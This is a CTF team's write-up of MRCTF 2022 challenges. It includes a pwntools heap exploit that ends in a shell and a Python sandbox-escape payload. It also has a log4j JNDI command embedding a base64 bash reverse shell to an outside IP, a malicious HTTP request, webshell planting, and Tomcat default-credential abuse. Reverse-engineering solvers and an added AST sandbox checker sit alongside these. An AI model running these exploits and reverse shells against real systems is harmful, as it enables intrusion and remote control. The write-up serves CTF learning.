# 2022 MRCTF Partial Writeup By Xp0int

xp0int Posted on Apr 25 2022

## 1. PWN

### 1.1 ezbash

`Author: xf1les & c1ark`

The program implements a bash-like shell with built-in commands such as `cp` and `cat`.

The struct that represents a file:

![title](https://leanote.com/api/file/getImage?fileId=62660e1eab64412e4505126a)

The first bug is in `sub_16E2`: when the `cp` command copies a file's contents it does not append a terminating null byte, so a libc address can be leaked:

![title](https://leanote.com/api/file/getImage?fileId=62660bd4ab64412e45051259)

The second bug is in `sub_17E7`, again in the `cp` command. When `cp` overwrites an existing file and the source file `src` is larger than the destination file `dest`, the pointer returned by `realloc` overwrites the `dest` pointer, which gives an arbitrary address write.

![title](https://leanote.com/api/file/getImage?fileId=62660c78ab64412e3e0628ff)

The exploit script:

```python
#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore", category=BytesWarning)

context(arch="amd64")
context(log_level="debug")

libc = ELF("./libc.so.6")

p_sl = lambda x, y : p.sendlineafter(y, str(x) if not isinstance(x, bytes) else x)
p_s = lambda x, y : p.sendafter(y, str(x) if not isinstance(x, bytes) else x)
libc_sym = lambda x : libc.symbols[x]
libc_symp = lambda x : p64(libc.symbols[x])
libc_os = lambda x : libc.address + x

p = remote("140.82.17.215", 21441)
# ~ p = process("./ezbash")

# "[0m" is the tail of the coloured prompt; every command waits for it
def touch(fn):
    p_sl(f"touch {fn}", "[0m")

def echo(fn, ctx):
    p_s("echo ", "[0m")
    p.send(ctx)
    p.sendline(f" -> {fn}")

def cp(a, b):
    p_sl(f"cp {a} {b}", "[0m")

def cat(fn):
    p_sl(f"cat {fn}", "[0m")

## leak: a large chunk lands next to libc data, and cp copies without a
## terminating null byte, so cat prints the bytes that follow the content
touch("pwn")
echo("pwn", "A"*0x1500)
echo("pwn", "A"*8)
cp('pwn', 'leak')
cat('leak')
p.recvuntil('A'*8)
libc.address = u64(p.recv(6).ljust(8, b'\x00')) - (0x1ebbe0+0x1000)
info("libcbase: 0x%lx", libc.address)

## overwrite __free_hook: src is larger than dst, so the realloc in cp
## clobbers the destination pointer and the copy writes system() there
touch("src")
touch("dst")
pp = (b'A'*0x30+libc_symp('system')).strip(b'\x00')
echo("src", pp)
pp = (b'A'*0x18+p64(libc_sym('__free_hook')-0x30)).strip(b'\x00')
echo("dst", pp)
cp("src", "dst")

## getshell: freeing a chunk holding "/bin/sh" calls system("/bin/sh")
p.sendline("/bin/sh")
p.interactive()
```

![title](https://leanote.com/api/file/getImage?fileId=626560d7ab64412e45051131)

### 1.2 Dynamic

`Author: xf1les`

A Python sandbox escape. Following [CTF Wiki](https://ctf-wiki.org/pwn/sandbox/python/python-sandbox-escape/), the internal attributes of `func` are used to reach the `open` and `read` functions in the globals of the `os._wrap_close` class and read the flag (the trailing `EOF` ends the input to the challenge):

```python
fd = func.__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__["op" + "en"]('flag', 0)
print(func.__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__["read"](fd, 0x100))
EOF
```

![title](https://leanote.com/api/file/getImage?fileId=62656091ab64412e3e0627e6)

## 2. RE

### 2.1 encfs

`Author: JANlittle & xf1les`

A kernel challenge. Mounting the filesystem with `mount` yields `encfs.ko` and the flag file. Analysing `encfs.ko` shows that two system calls, `write` and `openat`, are hooked; the one that modifies file contents is the `write` hook. Analysing the `write` hook function `NuniKYgPVMEd`, the main logic is: a plaintext initialised to all zeros is iteratively encrypted with SM4 to produce a series of ciphertext blocks, the ciphertext is XORed with the content being written, the result is rotated right, and that is written to the file. A simple gdb script that debugs `encfs.ko` and grabs the ciphertext used for the XOR, followed by reversing the process, recovers the flag.

```cpp
#include <cstdio>
#include <cstdint>

// The original used __ROL1__ from IDA's defs.h; this is the same 8-bit rotate-left.
static inline uint8_t rol1(uint8_t x, unsigned n) {
    return (uint8_t)((x << n) | (x >> (8 - n)));
}

int main() {
    FILE *fp = fopen("flag", "rb");
    if (!fp) { perror("flag"); return 1; }
    char flag[44] = {0};
    fread(flag, 1, 43, fp);
    fclose(fp);
    // keystream bytes captured from the write hook with the gdb script
    unsigned char xor_key[44] = {0xc8, 0x1c, 0xe7, 0x89, 0xdb, 0x71, 0x55, 0x3f, 0xc2, 0x2c, 0x9d, 0xf5, 0x11, 0x55, 0x8e, 0x9a, 0x66, 0x9a, 0x2d, 0xcc, 0x0d, 0xc7, 0x88, 0x01, 0x2e, 0x97, 0x54, 0x21, 0xfc, 0xd5, 0xdc, 0x03, 0x3e, 0x99, 0x98, 0x0c, 0x01, 0x92, 0xc0, 0xed, 0x21, 0x79, 0x9c, 0xe8};
    // The hook XORed with the keystream and then rotated right by 3,
    // so undo it by rotating left by 3 and then XORing.
    for (size_t i = 0; i < 43; i++)
        flag[i] = (char)(rol1((uint8_t)flag[i], 3) ^ xor_key[i]);
    printf("%s", flag);
    return 0;
}
```

### 2.2 Cicada

`Author: JANlittle`

A PE64 file in the style of malware analysis. The main code is self-modifying (SMC) and API calls are resolved implicitly through `GetProcAddress`, so stepping through it in a debugger gives the rough flow:

```
length must be 32
(_int128)input = str2hex(input)
qword a[4]; a[i]=*(int*)(&input+4*i)
a[i]=a[i]^(a[i]<<3&0xffffffff)^i
qword b[16]; b[i]=*(char*)(&a[i/4]+i%4)
verified against 16 linear equations
```

The encryption and verification of the flag in between are done in a VM-like fashion; the opcodes could not be located, so breaking at the point where the instructions are executed is enough.

```python
from z3 import *

def getAnsOfPowerOfTwo(a, b):
    # mask with bits a..b-1 set
    ans = 0
    for i in range(a, b):
        ans += pow(2, i)
    return ans

def getBit(n, i):
    t = pow(2, i)
    return (t & n) >> i

def leftShiftXor(n, m):
    # inverse of x ^ (x << m) on 32-bit values: the low m bits are unchanged,
    # and each higher bit i is n_i ^ x_(i-m), recovered from low to high
    r = n & getAnsOfPowerOfTwo(0, m)
    t = r
    for i in range(m, 32):
        t_i = getBit(t, i - m) ^ getBit(n, i)
        t += t_i << i
    return t & 0xffffffff

b = [Int('b%d' % i) for i in range(16)]
s = Solver()
for i in range(16):
    s.add(b[i] >= 0)
    s.add(b[i] <= 255)
s.add(0xa5*b[0] + 0xce*b[1] + 0xb8*b[2] + 0xbc*b[3] + 0x99*b[4] + 0xb7*b[5] + 0xe9*b[6] + 0xa0*b[7] + 0xc1*b[8] + 0xff*b[9] + 0x14*b[10] + 0x5c*b[11] + 0x22*b[12] + 0x66*b[13] + 0x85*b[14] + 0x51*b[15] == 0x41DC4)
s.add(0xa0*b[0] + 0xc*b[1] + 0x70*b[2] + 0x3e*b[3] + 0x16*b[4] + 0x34*b[5] + 0x9a*b[6] + 0x1c*b[7] + 0xa6*b[8] + 0x47*b[9] + 0x56*b[10] + 0x46*b[11] + 0x4e*b[12] + 0x1c*b[13] + 0xb3*b[14] + 0xdd*b[15] == 0x33C67)
s.add(0xbc*b[0] + 0x76*b[1] + 0xf4*b[2] + 0x6b*b[3] + 0x64*b[4] + 0xce*b[5] + 0x40*b[6] + 0xc6*b[7] + 0xcf*b[8] + 0x53*b[9] + 0x9b*b[10] + 0x38*b[11] + 0x36*b[12] + 0x30*b[13] + 0x15*b[14] + 0xdc*b[15] == 0x36e79)
s.add(0x4f*b[0] + 0xd*b[1] + 0x41*b[2] + 0x4b*b[3] + 0x67*b[4] + 0xd8*b[5] + 0xe9*b[6] + 0x78*b[7] + 0xb1*b[8] + 0xc5*b[9] + 0x0*b[10] + 0xd9*b[11] + 0xde*b[12] + 0x93*b[13] + 0xd8*b[14] + 0xc8*b[15] == 0x47569)
s.add(0xed*b[0] + 0x12*b[1] + 0x96*b[2] + 0x28*b[3] + 0x45*b[4] + 0xe2*b[5] + 0xe2*b[6] + 0x4b*b[7] + 0x1*b[8] + 0x7d*b[9] + 0xe3*b[10] + 0x13*b[11] + 0x8b*b[12] + 0x77*b[13] + 0x6a*b[14] + 0x58*b[15] == 0x30cb6)
s.add(0x6c*b[0] + 0x5*b[1] + 0x6d*b[2] + 0x8a*b[3] + 0x62*b[4] + 0xbd*b[5] + 0xb8*b[6] + 0x98*b[7] + 0xb3*b[8] + 0x9c*b[9] + 0xdf*b[10] + 0x10*b[11] + 0xc2*b[12] + 0x4d*b[13] + 0x77*b[14] + 0x87*b[15] == 0x3a143)
s.add(0xe0*b[0] + 0xa8*b[1] + 0x85*b[2] + 0x3b*b[3] + 0x64*b[4] + 0x7a*b[5] + 0x37*b[6] + 0xf7*b[7] + 0xfe*b[8] + 0x84*b[9] + 0xd2*b[10] + 0x37*b[11] + 0x48*b[12] + 0xc6*b[13] + 0xec*b[14] + 0x8d*b[15] == 0x417df)
s.add(0x9e*b[0] + 0xfd*b[1] + 0xdb*b[2] + 0x43*b[3] + 0x30*b[4] + 0x6a*b[5] + 0x6d*b[6] + 0x42*b[7] + 0x55*b[8] + 0xd5*b[9] + 0xda*b[10] + 0x32*b[11] + 0x23*b[12] + 0xd2*b[13] + 0xf6*b[14] + 0xe3*b[15] == 0x3edc2)
s.add(0x3c*b[0] + 0x43*b[1] + 0xab*b[2] + 0xec*b[3] + 0xea*b[4] + 0x1e*b[5] + 0xa7*b[6] + 0x92*b[7] + 0x6f*b[8] + 0x70*b[9] + 0x52*b[10] + 0xeb*b[11] + 0x96*b[12] + 0xa2*b[13] + 0x3*b[14] + 0x43*b[15] == 0x3c685)
s.add(0x8e*b[0] + 0xfb*b[1] + 0x73*b[2] + 0xbe*b[3] + 0xf8*b[4] + 0x67*b[5] + 0x72*b[6] + 0x3f*b[7] + 0x3f*b[8] + 0x77*b[9] + 0xd8*b[10] + 0x89*b[11] + 0x28*b[12] + 0xa8*b[13] + 0xbf*b[14] + 0xa4*b[15] == 0x3CFB4)
s.add(0xaa*b[0] + 0xe8*b[1] + 0xef*b[2] + 0x83*b[3] + 0xff*b[4] + 0x56*b[5] + 0x9a*b[6] + 0xe3*b[7] + 0xfb*b[8] + 0x4a*b[9] + 0x4a*b[10] + 0x76*b[11] + 0x9d*b[12] + 0x95*b[13] + 0x17*b[14] + 0x41*b[15] == 0x3EC38)
s.add(0xe4*b[0] + 0xa*b[1] + 0x1d*b[2] + 0x42*b[3] + 0xe3*b[4] + 0x3d*b[5] + 0x2d*b[6] + 0x57*b[7] + 0x18*b[8] + 0x8a*b[9] + 0xc3*b[10] + 0x5b*b[11] + 0xfa*b[12] + 0x59*b[13] + 0x38*b[14] + 0x92*b[15] == 0x2D960)
s.add(0xd1*b[0] + 0xa1*b[1] + 0x39*b[2] + 0x47*b[3] + 0xca*b[4] + 0xab*b[5] + 0x78*b[6] + 0xb3*b[7] + 0x4b*b[8] + 0x19*b[9] + 0xa1*b[10] + 0x21*b[11] + 0x84*b[12] + 0x26*b[13] + 0x90*b[14] + 0x50*b[15] == 0x2AEF0)
s.add(0x47*b[0] + 0x2f*b[1] + 0xc1*b[2] + 0x19*b[3] + 0x19*b[4] + 0x73*b[5] + 0x8*b[6] + 0x51*b[7] + 0x89*b[8] + 0x17*b[9] + 0x82*b[10] + 0xf1*b[11] + 0xc0*b[12] + 0x6d*b[13] + 0xcb*b[14] + 0x74*b[15] == 0x321B7)
s.add(0x5a*b[0] + 0x75*b[1] + 0x71*b[2] + 0x81*b[3] + 0x74*b[4] + 0xa4*b[5] + 0xa9*b[6] + 0xca*b[7] + 0x6*b[8] + 0xe5*b[9] + 0x41*b[10] + 0x34*b[11] + 0x74*b[12] + 0xde*b[13] + 0xd6*b[14] + 0x38*b[15] == 0x3611A)
s.add(0x5f*b[0] + 0x74*b[1] + 0x47*b[2] + 0x89*b[3] + 0xc1*b[4] + 0x91*b[5] + 0x69*b[6] + 0xf7*b[7] + 0x39*b[8] + 0x24*b[9] + 0xfd*b[10] + 0x93*b[11] + 0xa3*b[12] + 0x6a*b[13] + 0xdf*b[14] + 0x14*b[15] == 0x3333E)

if s.check() == sat:
    m = s.model()
    enc = [m[b[i]].as_long() for i in range(16)]
    # undo the byte split and the "^ i" step, then invert the shift-xor per dword
    flag = [int.from_bytes(bytes(enc[4*i:4*(i+1)]), 'little') ^ i for i in range(4)]
    for i in range(4):
        flag[i] = leftShiftXor(flag[i], 3)
    flag_byte = b''.join([flag[i].to_bytes(4, 'big') for i in range(4)])
    for i in range(16):
        print(hex(flag_byte[i])[2:].zfill(2), end='')
```
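Back to the sandbox in 1.2 Dynamic: the `"op" + "en"` split in that payload suggests the challenge filtered on substrings of the source, which is why the walk through `__class__`, `__bases__` and `__subclasses__` still got through. The checker below is an added example of my own, not code from the writeup or the challenge. It audits submitted source at the AST level, so string splitting does not hide a name, and it folds `"op" + "en"` back to `open` before checking subscript keys. All names (`audit_source`, `is_allowed`, the sets) are mine; `DYNAMIC_PAYLOAD` is the payload quoted in 1.2.

```python
import ast

# Attribute names whose access from untrusted code almost always means
# introspection aimed at escaping the sandbox (everything the Dynamic payload walks).
FORBIDDEN_ATTRS = {
    "__class__", "__bases__", "__mro__", "__subclasses__", "__init__",
    "__globals__", "__builtins__", "__dict__", "__getattribute__", "__getattr__",
    "__import__", "__reduce__", "__code__", "__func__", "__self__",
}
# Builtins that turn data back into code or look names up dynamically.
FORBIDDEN_CALLS = {"eval", "exec", "compile", "__import__", "getattr", "setattr",
                   "vars", "globals", "locals"}
# Subscript keys worth flagging once constant folding has been applied.
SENSITIVE_KEYS = {"open", "exec", "eval", "system", "popen", "__import__", "__builtins__"}

# The payload from section 1.2, used here as the sample input to the checker.
DYNAMIC_PAYLOAD = (
    'fd = func.__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__["op" + "en"](\'flag\', 0)\n'
    'print(func.__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__["read"](fd, 0x100))\n'
)


def fold_string(node):
    """Fold a string literal, or a '+' chain of string literals, into one str.
    Anything else yields None, so "op" + "en" is seen as "open"."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold_string(node.left), fold_string(node.right)
        if left is not None and right is not None:
            return left + right
    return None


def audit_source(src):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    try:
        tree = ast.parse(src)
    except SyntaxError as exc:
        return [f"line {exc.lineno}: syntax error: {exc.msg}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr in FORBIDDEN_ATTRS:
            findings.append(f"line {node.lineno}: attribute {node.attr}")
        elif isinstance(node, ast.Subscript):
            sl = node.slice
            index_cls = getattr(ast, "Index", None)  # Python 3.8 wrapped the key in ast.Index
            if index_cls is not None and isinstance(sl, index_cls):
                sl = sl.value
            key = fold_string(sl)
            if key is not None and (key in SENSITIVE_KEYS or key.startswith("__")):
                findings.append(f"line {node.lineno}: subscript key {key!r}")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name) \
                and node.func.id in FORBIDDEN_CALLS:
            findings.append(f"line {node.lineno}: call to {node.func.id}")
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append(f"line {node.lineno}: import statement")
    return findings


def is_allowed(src):
    """True only when the audit finds nothing."""
    return not audit_source(src)


if __name__ == "__main__":
    for finding in audit_source(DYNAMIC_PAYLOAD):
        print(finding)
    print("allowed:", is_allowed("x = [i * i for i in range(5)]\nprint(x)"))
```

Run against the 1.2 payload this reports the five dunder attribute accesses on each line plus the folded `'open'` subscript key, and a plain list comprehension passes clean. An AST gate like this raises the bar but is not a sandbox on its own: in-process restrictions on CPython are routinely bypassed, so untrusted code should additionally run in a separate process or container with seccomp, no network and a read-only filesystem.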
## 3. MISC

### 3.1 ReadLongNovel

`Author: hututu`

An information-search challenge: just search the questions on Google.

```json
{
  "14": { "answer": "数字化改造", "question": "四级文明迈向五级文明的经典标志是" },
  "19": { "answer": "启迪者文明", "question": "格利泽文明遇到的第一个星际文明是哪个文明" },
  "5": { "answer": "3", "question": "在飞船上的第一次考试中,张远在太空机械学专业排名是多少?" },
  "1": { "answer": "卡普坦", "question": "飞船黄金太阳号的航行目标是哪里?" },
  "49": { "answer": "五千万", "question": "泰坦级巨型母舰能够容纳多少万人口" },
  "30": { "answer": "启程号", "question": "新人类第一艘泰坦级巨型母舰被命名为什么" },
  "6": { "answer": "深空基金会", "question": "在地球上,张远将所有财产,捐赠给了哪个组织?" },
  "16": { "answer": "林方正", "question": "社会公养体系由哪位教授提出" },
  "45": { "answer": "克隆", "question": "半球明的主要繁殖方式是什么" },
  "26": { "answer": "阿列夫文明", "question": "银河系未来将成为哪个生物的标准智慧单元" },
  "42": { "answer": "好友兼师兄", "question": "赵青锋和张远的关系是" },
  "20": { "answer": "六亿", "question": "在虚拟世界所有回归者中排名第一的传奇人物获得了多少亿分?" },
  "28": { "answer": "文学作家", "question": "林青青在老年时期成为了什么" },
  "4": { "answer": "李俊康", "question": "\"鹰隼一号\"驱逐舰的舰长是谁?" },
  "35": { "answer": "计算", "question": "新文明史学的核心思想是通过什么方法来规划文明的未来走向" },
  "38": { "answer": "冬眠", "question": "地球文明数千亿计的人们通过什么方式来逃避现实" },
  "29": { "answer": "2509", "question": "黄金太阳号于纪元多少年离开母星地球" },
  "12": { "answer": "阿米巴文明", "question": "银河系的第三任治理者是哪个文明" },
  "31": { "answer": "抗打击能力", "question": "战星相较于飞船什么能力最为突出" },
  "9": { "answer": "陈牧", "question": "人类第一次来到环泰文明交易市场时,由谁负责对接?" },
  "47": { "answer": "万物理论", "question": "深空大学的学术期刊名为?" },
  "27": { "answer": "新文明史学", "question": "人类获得格利泽文明的详细历史资料是为了完善什么?" },
  "11": { "answer": "塔比文明", "question": "哪个文明委托棘哈曼文明建造了戴森球" },
  "46": { "answer": "一级", "question": "可控核聚变技术属于几级文明?" },
  "24": { "answer": "五个", "question": "超凡者考核中,至少完成几个轮回可以选择通过考核" },
  "39": { "answer": "仙女星系", "question": "阿米巴文明起源于哪个星系?" },
  "0": { "answer": "两艘", "question": "地球上的人类一共发射了几艘深空殖民舰" },
  "10": { "answer": "180", "question": "租用一艘小型曲率飞船需要多少阿米巴积分?" },
  "32": { "answer": "曲率科技", "question": "哪种科技是四级文明的核心技术" },
  "34": { "answer": "大目标", "question": "五级文明在哲学层面最大的难点是培养永恒的什么?" }
}
```

The answer check is probably a string match, so use short phrases rather than whole sentences when writing the answers. Submitting gives the flag: MRCTF{愿您的+文明+永远进步}.
## 4. BONUS

### 4.1 Java_mem_shell_Filter

`Author: ABU`

The classic log4j vulnerability. Using the JNDI-Injection-Exploit-1.0.jar tool, run on the VPS:

`java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzEyMS41LjIzOC41Mi8zMDY2MCAwPiYx}|{base64,-d}|{bash,-i}" -A "vps"`

(the base64 part is a Linux reverse shell). Then start a listener on the VPS and send the payload with Burp:

```http
POST /MyServlet HTTP/1.1
Host: 106.75.33.92:8888
Content-Length: 58
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://106.75.33.92:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://106.75.33.92:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=69C73CB7EA1030A2098BDF9910465525
Connection: close

name=${jndi:ldap://vps:1389/cqv147}&password=ssss
```

The reverse shell comes back:

![title](https://leanote.com/api/file/getImage?fileId=62655e3dab64412e3e0627e1)

The flag still has to be found. To make searching easier, `shell.jsp` was written to `/usr/local/apache-tomcat-8.0.12/webapps/shell/` and connected to with Behinder (冰蝎):

![title](https://leanote.com/api/file/getImage?fileId=62655fa1ab64412e4505112d)

Downloading `e.bin` reveals the flag:

![title](https://leanote.com/api/file/getImage?fileId=62655fd6ab64412e4505112f)

Flag: MRCTF{7hi3_is_a_Fi1ter_TpYe_Mem3he1l}

### 4.2 Java_mem_shell_Basic

`Author: ABU`

The classic Tomcat weakness: log in with the default credentials tomcat:tomcat, upload a WAR, and connect to the webshell with Behinder.

The flag is found at `/usr/local/apache-tomcat-8.0.12/work/Catalina/localhost/ROOT/org/apache/jsp/threatbook_jsp.java`:

![title](https://leanote.com/api/file/getImage?fileId=62655bdcab64412e4505111d)

Flag: MRCTF{Th1s_i5_4_Web5he11_l04ded_wi7h_JSPL0ader}